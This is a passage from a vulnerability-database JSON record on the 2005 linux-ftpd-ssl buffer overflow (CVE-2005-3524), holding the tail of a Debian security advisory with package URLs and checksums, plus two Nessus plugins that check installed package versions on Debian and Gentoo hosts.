http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/ftpd-ssl_0.17.18+0.3-3sarge1_arm.deb\n Size/MD5 checksum: 49478 d964f72a931cee99c560c1f348b9f733\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/ftpd-ssl_0.17.18+0.3-3sarge1_i386.deb\n Size/MD5 checksum: 48598 6092dcf5345c383959b9b8b3a9d9b65f\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/ftpd-ssl_0.17.18+0.3-3sarge1_ia64.deb\n Size/MD5 checksum: 65312 1f80c1ef53e6151a8d7df0ed0f2160cb\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/ftpd-ssl_0.17.18+0.3-3sarge1_hppa.deb\n Size/MD5 checksum: 53384 a247343d426eb9ecff838905432943d8\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/ftpd-ssl_0.17.18+0.3-3sarge1_m68k.deb\n Size/MD5 checksum: 46112 bedd079aca908ad7f31f7fb8fe0ecab7\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/ftpd-ssl_0.17.18+0.3-3sarge1_mips.deb\n Size/MD5 checksum: 52262 fe07040d4d3db4fe2cd4e02c873131ee\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/ftpd-ssl_0.17.18+0.3-3sarge1_mipsel.deb\n Size/MD5 checksum: 52074 5b1e112532d8b07ab278d036515d85d3\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/ftpd-ssl_0.17.18+0.3-3sarge1_powerpc.deb\n Size/MD5 checksum: 52050 bd09d568c4e634670c698dbe33cd4775\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/ftpd-ssl_0.17.18+0.3-3sarge1_s390.deb\n Size/MD5 checksum: 51862 d4cb84830ca8a631ed5e08344e286b18\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/ftpd-ssl_0.17.18+0.3-3sarge1_sparc.deb\n Size/MD5 checksum: 48822 d47e7a161940d64f82a7edb87df7ff3e\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2005-11-15T00:00:00", "published": "2005-11-15T00:00:00", "id": "DEBIAN:DSA-896-1:67008", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00294.html", "title": "[SECURITY] [DSA 896-1] New ftpd-ssl packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T10:52:00", "description": "The remote host is affected by the vulnerability described in GLSA-200511-11\n(linux-ftpd-ssl: Remote buffer overflow)\n\n A buffer overflow vulnerability has been found in the\n linux-ftpd-ssl package. A command that generates an excessively long\n response from the server may overrun a stack buffer.\n \nImpact :\n\n An attacker that has permission to create directories that are\n accessible via the FTP server could exploit this vulnerability.\n Successful exploitation would execute arbitrary code on the local\n machine with root privileges.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2005-11-15T00:00:00", "title": "GLSA-200511-11 : linux-ftpd-ssl: Remote buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3524"], "modified": "2005-11-15T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:netkit-ftpd", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200511-11.NASL", "href": "https://www.tenable.com/plugins/nessus/20198", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200511-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20198);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-3524\");\n script_xref(name:\"GLSA\", value:\"200511-11\");\n\n script_name(english:\"GLSA-200511-11 : linux-ftpd-ssl: Remote buffer overflow\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200511-11\n(linux-ftpd-ssl: Remote buffer overflow)\n\n A buffer overflow vulnerability has been found in the\n linux-ftpd-ssl package. A command that generates an excessively long\n response from the server may overrun a stack buffer.\n \nImpact :\n\n An attacker that has permission to create directories that are\n accessible via the FTP server could exploit this vulnerability.\n Successful exploitation would execute arbitrary code on the local\n machine with root privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200511-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All ftpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-ftp/netkit-ftpd-0.17-r3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:netkit-ftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/15\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-ftp/netkit-ftpd\", unaffected:make_list(\"ge 0.17-r3\"), vulnerable:make_list(\"lt 0.17-r3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-ftpd-ssl\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:03:39", "description": "A buffer overflow has been discovered in ftpd-ssl, a simple BSD FTP\nserver with SSL encryption support, that could lead to the execution\nof arbitrary code.", "edition": 25, "published": "2006-10-14T00:00:00", "title": "Debian DSA-896-1 : linux-ftpd-ssl - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3524"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:linux-ftpd-ssl"], "id": "DEBIAN_DSA-896.NASL", "href": "https://www.tenable.com/plugins/nessus/22762", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-896. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22762);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-3524\");\n script_xref(name:\"DSA\", value:\"896\");\n\n script_name(english:\"Debian DSA-896-1 : linux-ftpd-ssl - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow has been discovered in ftpd-ssl, a simple BSD FTP\nserver with SSL encryption support, that could lead to the execution\nof arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=339074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-896\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ftpd-ssl package.\n\nThe old stable distribution (woody) does not contain linux-ftpd-ssl\npackages.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 0.17.18+0.3-3sarge1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-ftpd-ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"ftpd-ssl\", reference:\"0.17.18+0.3-3sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
